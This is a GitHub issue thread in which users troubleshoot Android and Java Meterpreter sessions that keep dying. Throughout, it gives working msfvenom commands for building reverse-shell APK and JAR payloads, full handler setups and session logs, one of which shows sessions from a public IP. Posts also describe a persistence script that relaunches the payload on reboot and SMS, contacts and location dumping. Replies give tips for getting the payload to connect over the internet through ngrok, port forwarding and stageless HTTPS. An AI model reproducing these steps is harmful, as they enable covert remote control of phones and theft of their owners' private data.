Android meterpreter crashes (Android L 5.0.1)
comertcimen opened this issue · 32 comments
To reproduce:
(1) Generate a .apk file for Android Meterpreter
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.12 LPORT=4444 R > Android.apk
(2) Create a handler for Android Meterpreter (on Armitage)
msf > use exploit/multi/handler
msf exploit(handler) > set LHOST 192.168.1.12
LHOST => 192.168.1.12
msf exploit(handler) > set DisablePayloadHandler false
DisablePayloadHandler => false
msf exploit(handler) > set LPORT 4444
LPORT => 4444
msf exploit(handler) > set PAYLOAD android/meterpreter/reverse_tcp
PAYLOAD => android/meterpreter/reverse_tcp
msf exploit(handler) > set TARGET 0
TARGET => 0
msf exploit(handler) > set ExitOnSession false
ExitOnSession => false
msf exploit(handler) > exploit -j
[] Exploit running as background job.
[] Started reverse handler on 192.168.1.12:4444
[] Starting the payload handler...
[] Sending stage (50643 bytes) to 78.162.55.92
[] 78.162.55.92 - Meterpreter session 1 closed. Reason: Died
[] Meterpreter session 1 opened (127.0.0.1 -> 78.162.55.92:51289) at 2015-07-23 22:12:51 +0300
[-] Meterpreter session 1 is not valid and will be closed
[] Sending stage (50643 bytes) to 78.162.55.92
[] Meterpreter session 2 opened (192.168.1.12:4444 -> 78.162.55.92:38172) at 2015-07-23 22:12:55 +0300
[] 78.162.55.92 - Meterpreter session 2 closed. Reason: Died
[] Sending stage (50643 bytes) to 78.162.55.92
[] Meterpreter session 3 opened (192.168.1.12:4444 -> 78.162.55.92:36417) at 2015-07-23 22:13:21 +0300
[] 78.162.55.92 - Meterpreter session 3 closed. Reason: Died
[] Sending stage (50643 bytes) to 78.162.55.92
[] Meterpreter session 4 opened (192.168.1.12:4444 -> 78.162.55.92:52956) at 2015-07-23 22:17:07 +0300
[] Sending stage (50643 bytes) to 78.162.55.92
[] Meterpreter session 5 opened (192.168.1.12:4444 -> 78.162.55.92:48955) at 2015-07-23 22:17:09 +0300
[] Sending stage (50643 bytes) to 78.162.55.92
[] Meterpreter session 6 opened (192.168.1.12:4444 -> 78.162.55.92:44943) at 2015-07-23 22:17:10 +0300
[] Sending stage (50643 bytes) to 78.162.55.92
[] Meterpreter session 7 opened (192.168.1.12:4444 -> 78.162.55.92:40981) at 2015-07-23 22:17:11 +0300
[] 78.162.55.92 - Meterpreter session 4 closed. Reason: Died
[] 78.162.55.92 - Meterpreter session 5 closed. Reason: Died
[] 78.162.55.92 - Meterpreter session 6 closed. Reason: Died
[] 78.162.55.92 - Meterpreter session 7 closed. Reason: Died
[-] Failed to load extension: No response was received to the core_enumextcmd request.
So what is the problem?
I can't reproduce this on a 5.0.1 emulator with rapid7/metasploit-framework@50c9293. Which device/emulator? Could you try set AutoVerifySession false on the handler please? Also could you provide the output from adb logcat?
Thanks for reporting!
p.s You might want to report this on https://github.com/rapid7/metasploit-framework or https://github.com/rapid7/metasploit-payloads, as this repository is deprecated.
Looks like your binaries are out of date to me. Are you using kali?
Anyone got this to work?
I'm having no issues at all. But I don't have a Galaxy note. It still looks like out of date binaries to me.
I've been using Android M a lot lately with no issues either.
I use android/meterpreter/reverse_https on samsung galaxy note 4 with android 5, because reverse_tcp crashes and says conection closed. Died
how to use reverse_https ??? use with set PAYLOAD alone or make it first using msfvenom .apk after that with payload set command ?????
i try reverse_tcp with my nexus5 phone android 6.01 M and it will got meterpreter session closed !!!! any idea ??????
@khanfar reverse_https has to be set both with msfvenom .apk (use port 8443) and payload (leave lport as default)
in my case, reverse_https meterpreter session dies after 20/30 sec, and reverse_tcp also dies (but in lucky case is opened for more than a minute).
(tried on galaxy s6, lollipop with kali on vmware)
I don't know if app is closed by android os or it crashes (i cannot have a logcat right now), seems that something wrong happens to client-side (on android terminal)
Apparently is when the screen locks
That's not a crash, that's just the phone going to sleep and killing idle applications. The change to convert this to work as a service is in now, you can try it out now if you want to build the latest android meterpreter directly from the master branch of metasploit-payloads.
Got it mine working update SDK accordingly and use exploit -j command to session
I'm facing the same issue right now. I'm using metasploit version metasploit v4.13.1-dev-ec020e3d079ad1959418220409995f033ab3d409
session is closed in 10 seconds! I tried it on Andorid L 5.1
I have the same issues. I have built the reverse_tcp meterpreter for android and set up persistent script for it to run the MainActivity every 20 seconds or so. It works across reboots but now on most commands the session dies and it will not re-connect the meterpreter shell until the next reboot.
Session #1 - Dies running dump_sms
msf exploit(handler) > [] Sending stage (xxxxx bytes) to x.x.x.x
[] Meterpreter session 1 opened (x.x.x.x:443 -> x.x.x.x:random-port) at date-stamp
msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > dump_sms
[*] x.x.x.x- Meterpreter session 1 closed. Reason: Died
Session #2 - Dies running wlan_geolocate
meterpreter > dump_contacts
[-] Error running command dump_contacts: Rex::TimeoutError Operation timed out.
meterpreter > geolocate
[-] android_geolocate: Operation failed: 1
meterpreter > wlan_geolocate
[*] x.x.x.x- Meterpreter session 2 closed. Reason: Died
Busterb - you mention there is a newer version of the android meterpreter that I can use that may solve this? I am running Kali linux and the latest version of metasploit-framework:Framework Version: 4.14.1-dev. Should I re-instal from the Github or do I have the latest scripts for everything? Any ideas why this would be occuring? It is notable to mention that most commands fail in general - such as I cannot gather audio of more than 20 seconds - and cannot dump calllog, geolocate and most others have an error or fail and cause disconnection.
I just installed new clean install of Debian and installed metasploit-framework from Github and still same issues. The android meterpreter doesn't work for most commands - just crashes when trying any commands like my last post.
same here.
but...
the session is dying only when the phone (lg g5 ver:6.0.1) connected to the 4g.
when the phone connected to the wifi it works just fine.
btw i'am use vps (virtual private serve)
got few theory's:
1.the internet speed matters (upload and download)
2 the isp (Internet service provider) blocks it
so, could just be a timeout over slow networks.
As I experienced Reverse_tcp works well on Redmi 2 but not on Samsung Galaxy J5
So it is not a crash.
Else working on it...
@n30tr3x is right using reverse_https solves the problem .
I am seeing the same problem with java/meterpreter/reverse_tcp payload.
Jar:
msfvenom -f raw -p java/meterpreter/reverse_tcp LHOST=172.16.189.167 LPORT=4444 -o ~/Desktop/meterpreter.jar
Handler:
Payload options (java/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 172.16.189.167 yes The listen address
LPORT 4444 yes The listen port
Error messages below:
msf exploit(handler) > run
[*] Started reverse TCP handler on 172.16.189.167:4444
[*] Starting the payload handler...
[*] Sending stage (49645 bytes) to 172.16.189.158
[*] Meterpreter session 9 opened (172.16.189.167:4444 -> 172.16.189.158:49158) at 2017-09-21 23:31:14 -0400
meterpreter >
[*] 172.16.189.158 - Meterpreter session 9 closed. Reason: Died
@n3otr3x i am new and not sure how to set up https payload, is it basicly the same as a tcp where i would make the apk and then install it on the device?
Try Using Stageless payload
Meterpreter_reverse_https
Mostly it's an issue with the type of the mobile phone you are using
Not a Bug in Metasploit
[*] Started reverse TCP handler on 0.0.0.0:4444
Error hellp
I babe the same problem, with android/meterpreter/reverse_http, on LAN ir Works,but on WAN ir says meterpreter session 1 opened but dont start meterpreter i cancel the exploit with cntrl+c qnd type sessions 1 qnd open meterpreter, but when i type help just apeears the general comanda, bot android commands... Pls help me
Have*
Don't use LHOST = 0.0.0.0
LHOST is the address that will be embedded into the payload for it to connect to. If you don't have LHOST as a specific, routable address, you will not be able to connect the payload to it.
I uses LHOST = ddns ip
First update metasploit to version 4.16.40-dev via github and use free installer to install it then to fix this problem open the folder ngrok is located in and type ./ngrok tcp whatever port your using.
[*] Started reverse TCP handler on 0.0.0.0:4444
Error hellp
I think it's a port forwarding problem, if you use no-ip do not forget update via console, also setting NAT on router on port 4444
Hi fellow hackers, you might want to stop using Armitage, I know it's much more comfortable but remember, as it has GUI that controls metasploit you are limited to what Armitage offers and not to what metasploit offers, for example I found out that first of all Armitage is much slower, second, when you type the command 'shell' on a meterpreter session on Armitage, It does not work, metasploit Is just soo much better and it might work with metasploit, give it a try.
It takes time to get used t metasploit but it is much faster and much more powerful
exploit -j -z